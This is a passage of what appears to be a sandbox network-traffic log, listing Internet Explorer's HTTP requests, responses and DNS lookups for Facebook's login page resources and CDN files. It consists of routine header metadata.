                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Thu, 17 Oct 2024 05:02:33 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: 8+8w3OlaRgQuE5P3aQtiSA==
                                                                                              X-FB-Debug: mEeNWmEAr3C1IgjRpPqxGbil2JMoKgJk8C90bG/oM5enzTam+TPITpw3vGcQ8BtJdTTKwJ59dQf6lS9r4gxRkg==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 7959
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/0RhnME2MYqk.css?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yl/l/0,cross/0RhnME2MYqk.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: text/css; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Mon, 21 Oct 2024 21:41:25 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: VG3dsRYWESj8CDgZFv/DdQ==
                                                                                              X-FB-Debug: bMmT6Q1XFczQH9eLpyxdhYmMcyUzTBve34M+/KB5jZ9xhVZ545q1ki7RynUeRlpDBxeAPA6zBgpRntDBZvsNNQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 8210
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/SeW64FDUgJN.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yM/r/SeW64FDUgJN.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Thu, 17 Oct 2024 02:22:05 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: HEKpxAFeEZdB+C0/5z5Hrg==
                                                                                              X-FB-Debug: KqmPys5MupZuE74aqD7vtP7B3R6bzoSLXDRGe8m2XBBe0gK4dj7s/j0lsNKzkfNnpD49S0bRBwggOVJumBxgyw==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 9161
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/dXk5exdOVhk.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/y1/r/dXk5exdOVhk.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Sat, 19 Oct 2024 06:09:12 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: ivkhXUQG4wQzNqI4NjhapA==
                                                                                              X-FB-Debug: g/ms9RrjuWeQAqxLvedz+j8xnfb67sNZz3lzpGDJz2AKv8e174CiRYE+o3MGXPD8kj9NMrsrbNMuFIcVWfZ9og==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 302
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/j-yx5qHhmGi.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yH/r/j-yx5qHhmGi.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Mon, 21 Oct 2024 18:04:57 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              origin-agent-cluster: ?0
                                                                                              content-md5: /ETvxchYO/9tzNxYTTJICA==
                                                                                              X-FB-Debug: P+1WODmAhreAMHD/XQvbbp/EObCVfk2XR07D5640PpJEUHixmRrRuO5wPT2nPQBmHcD3o0RVPpTI5IJ/UJMVoQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 6543
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/xEUODc7mbZF.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/ys/r/xEUODc7mbZF.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Thu, 17 Oct 2024 05:01:17 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: VeEwKryJIPK7hWbFLpYLPw==
                                                                                              X-FB-Debug: b49nRBhleWpK6P9r3iUce3ZPoYDapylSKzNv0uI2BrIKCI16d70kdhVKBN/KhvLCr3uiFYSEAAL5TDwBI77EaQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 13269
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/y7/r/QJ_ErdZuyUE.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/y7/r/QJ_ErdZuyUE.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Sun, 20 Oct 2024 20:41:17 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: VCYbkNxfhFY/Haiu1+Oo8w==
                                                                                              X-FB-Debug: C8zO/tFqIt9UH6S+4vsxPb+Fk7aCMmO28kWhJ9vTSAusP1jRGlsqWwP1+8ZcCe6a9cLiLLvP77Fj9Mea/iRN+w==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 1301
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3ihVQ4/yp/l/en_US/M_qt8gV3koE.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3ihVQ4/yp/l/en_US/M_qt8gV3koE.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Sun, 20 Oct 2024 04:02:55 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: um3kve/WZuntPX84TpHm0w==
                                                                                              X-FB-Debug: fq8BmpaBvLalJSWRYcSqxeIy1il583LxuC+YEdB+xyH0JInzpHkF72ccv79AmOuXsD+BYQm0K2SJqtvwiA9b4Q==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 15176
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://facebook.com/security/hsts-pixel.gif?c=3.2
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.35:443
                                                                                              Request
                                                                                              GET /security/hsts-pixel.gif?c=3.2 HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Location: https://fbcdn.net/security/hsts-pixel.gif?c=2
                                                                                              reporting-endpoints:
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              Content-Type: text/html; charset="utf-8"
                                                                                              X-FB-Debug: Ht/c8oHcN04kBbyax4miJOYiIE5HwZy000XTvR2dyrk2CVyr+o/4FIQVhbrKIEN5UzUGW3O7yDum+gJU4Tw6jQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 0
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fbcdn.net
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fbcdn.net
                                                                                              IN A
                                                                                              Response
                                                                                              fbcdn.net
                                                                                              IN A
                                                                                              157.240.201.35
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://fbcdn.net/security/hsts-pixel.gif?c=2
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.35:443
                                                                                              Request
                                                                                              GET /security/hsts-pixel.gif?c=2 HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Connection: Keep-Alive
                                                                                              Host: fbcdn.net
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Location: https://fbsbx.com/security/hsts-pixel.gif
                                                                                              reporting-endpoints:
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
                                                                                              Content-Type: text/html; charset="utf-8"
                                                                                              X-FB-Debug: j8T1xlfK1wjqGKMVmAipd+IErP8Z70xbezjWtvp59iDSCPrdiCX8SeMR2SrtX1SO3Qd/QkptZlorPUC+eU6vcQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 0
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fbsbx.com
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fbsbx.com
                                                                                              IN A
                                                                                              Response
                                                                                              fbsbx.com
                                                                                              IN A
                                                                                              157.240.201.35
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://fbsbx.com/security/hsts-pixel.gif
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.35:443
                                                                                              Request
                                                                                              GET /security/hsts-pixel.gif HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Connection: Keep-Alive
                                                                                              Host: fbsbx.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: image/gif
                                                                                              reporting-endpoints:
                                                                                              content-security-policy: default-src data: blob: *.fbcdn.net *.fbsbx.com;script-src *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *.fbcdn.net *.fbsbx.com;connect-src *.fbcdn.net attachment.fbsbx.com blob: 'self' *.fbsbx.com;font-src *.fbsbx.com fbsbx.com *.fbcdn.net data:;img-src *.fbsbx.com *.fbcdn.net data: blob:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              Pragma: private
                                                                                              Cache-Control: private
                                                                                              Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: DENY
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
                                                                                              X-FB-Debug: QHlo1uL3Ukgp4qt9E9mXeZJi6r0dl3y+3YbQVfAi6OKNAKer05p/hO7cK4o3H830iACDQjl5N10PuXoL7dYiDA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.247.35:443
                                                                                              Request
                                                                                              GET /images/cookies/cookie_info_popup_image_4.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              content-md5: Ae8VnBRpCv1xxClCp11bLQ==
                                                                                              Edge-Control: cache-maxage=86400s
                                                                                              Expires: Wed, 25 Oct 2023 05:01:04 GMT
                                                                                              Cache-Control: public,max-age=86400
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              X-FB-Debug: ZAYDhdNHzAc+T3T0n3As8DeA1nZL7mostmHFvda6W2fTKD6uOr+jQMzJ9ouyv1uUQkzalXyEb8nZ990zSN1cwg==
                                                                                              Date: Tue, 24 Oct 2023 05:01:04 GMT
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 38147
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/images/cookies/cookie_info_card_image_1.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.247.35:443
                                                                                              Request
                                                                                              GET /images/cookies/cookie_info_card_image_1.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              content-md5: Nmnpiyrpc00QHVchkNDJDQ==
                                                                                              Edge-Control: cache-maxage=86400s
                                                                                              Expires: Tue, 24 Oct 2023 23:44:05 GMT
                                                                                              Cache-Control: public,max-age=86400
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              origin-agent-cluster: ?0
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              X-FB-Debug: cUc9Xywyq3g3ujcgmArhovrMnlNu62k1z3KQGVwYIQpRTzkTkuonsR0XrmJR3f/JQER1TtH9SBjdz1nDxYwAHg==
                                                                                              Date: Mon, 23 Oct 2023 23:44:05 GMT
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 22180
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.247.35:443
                                                                                              Request
                                                                                              GET /images/cookies/cookie_info_popup_image_2.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              content-md5: vq/Hc42i1NUD0re9tbXumw==
                                                                                              Edge-Control: cache-maxage=86400s
                                                                                              Expires: Tue, 24 Oct 2023 19:20:55 GMT
                                                                                              Cache-Control: public,max-age=86400
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              origin-agent-cluster: ?0
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              X-FB-Debug: hz0zuas22W/zDsfnwduOVGc+0NDmJ60gaAFovzqH5mRsXfWu1zQiiaZ7gJwpy5rU/Ba2NmNuaAcKT/jNFJi0ZA==
                                                                                              Date: Mon, 23 Oct 2023 19:20:55 GMT
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 47514
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.247.35:443
                                                                                              Request
                                                                                              GET /images/cookies/cookie_info_popup_image_3.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              content-md5: YhcU5SV/bTVsWSaxO4wgGA==
                                                                                              Edge-Control: cache-maxage=86400s
                                                                                              Expires: Wed, 25 Oct 2023 05:04:27 GMT
                                                                                              Cache-Control: public,max-age=86400
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
                                                                                              document-policy: force-load-at-top
